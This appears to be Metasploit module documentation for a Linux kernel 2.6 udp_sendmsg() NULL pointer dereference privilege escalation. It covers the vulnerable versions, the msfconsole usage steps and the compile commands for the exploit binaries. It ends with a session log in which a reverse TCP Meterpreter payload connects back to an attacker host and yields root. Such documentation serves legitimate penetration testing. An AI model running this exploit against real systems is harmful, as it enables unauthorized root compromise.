rapid7/metasploit-framework
# Add Linux Kernel udp_sendmsg() MSG_MORE ip_append_data() NULL Pointer  Dereference Privilege Escalation

An old but excellent exploit from the same era as `exploit/linux/local/sock_sendpage`. This exploit supports both x86 and x86_64 targets, whereas `sock_sendpage` supports only x86.

---

## Vulnerable Application

This module exploits a NULL pointer dereference in the `udp_sendmsg()`
function in Linux kernels 2.6.0 <= 2.6.18.8 to gain root privileges.

The `udp_sendmsg()` routing table pointer `struct rtable *rt` is
initialized as NULL. Sending a message to a UDP socket with the
`MSG_MORE` flag instructs the kernel that more data is pending,
which leads to calling `ip_append_data()` with the NULL rt,
resulting in execution of arbitrary code mapped at page zero.

Failed exploitation may crash the kernel.

Mapping page zero is forbidden on systems with an effective
`vm.mmap_min_addr` or configured with the UDEREF feature of
PaX/GrSecurity, preventing exploitation.

This module has been tested successfully on:

* CentOS 4.4 Server (x86_64) kernel 2.6.9-42.EL
* Debian 4.0r0 (i386) kernel 2.6.18-4-686
* Debian 4.0r7 (x86_64) kernel 2.6.18-6-amd64

## Verification Steps

1. Start `msfconsole`
1. Get a session
1. `use exploit/linux/local/udp_sendmsg_msg_more_ip_append_data_null_pointer_deref_priv_esc`
1. `set SESSION <SESSION>`
1. `check`
1. `run`
1. You should get a new *root* session

## Options

### WritableDir

A writable directory file system path. (default: `/tmp`)

### COMPILE

Options: `Auto` `True` `False` (default: `Auto`)

Whether the exploit should be live compiled with `gcc` on the target system,
or uploaded as a pre-compiled binary.

`Auto` will first determine if `gcc` is installed to compile live on the system,
and fall back to uploading pre-compiled binaries.

## Compiled Executables

The module makes use of two pre-compiled exploit executables:

* `udp_sendpage.x86`
* `udp_sendpage.x86_64`

These are used when `gcc` is not available on the target host for live compiling,
or `COMPILE` is set to `False`.

The executables were cross-compiled with [musl-cross](https://s3.amazonaws.com/muslcross/musl-cross-linux-6.tar).

```sh
./i486-linux-musl-gcc -o udp_sendpage.x86 -s -pie -static udp_sendpage.c 
./x86_64-linux-musl-gcc -o udp_sendpage.x86_64 -s -pie -static udp_sendpage.c 
```

## Scenarios

### CentOS 4.4 Server (x86_64) kernel 2.6.9-42.EL

```
msf6 > use exploit/linux/local/udp_sendmsg_msg_more_ip_append_data_null_pointer_deref_priv_esc 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/udp_sendmsg_msg_more_ip_append_data_null_pointer_deref_priv_esc) > set session 1
session => 1
msf6 exploit(linux/local/udp_sendmsg_msg_more_ip_append_data_null_pointer_deref_priv_esc) > check
[*] The target appears to be vulnerable.
msf6 exploit(linux/local/udp_sendmsg_msg_more_ip_append_data_null_pointer_deref_priv_esc) > set verbose true
verbose => true
msf6 exploit(linux/local/udp_sendmsg_msg_more_ip_append_data_null_pointer_deref_priv_esc) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf6 exploit(linux/local/udp_sendmsg_msg_more_ip_append_data_null_pointer_deref_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Kernel version 2.6.9 appears to be vulnerable
[+] System architecture x86_64 is supported
[+] vm.mmap_min_addr allows mapping NULL page
[+] grsecurity is not in use
[+] The target appears to be vulnerable.
[*] Dropping pre-compiled exploit on system...
[*] Launching exploit ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 172.16.191.208
[*]  [+] MAPPED ZERO PAGE!
[*] sh: no job control in this shell
[*] sh-3.00# [1] 6437
[*] exit
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.208:32780) at 2021-02-21 17:47:54 -0500
meterpreter > getuid
Server username: root @ localhost.localdomain (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 4.4 (Linux 2.6.9-42.EL)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```
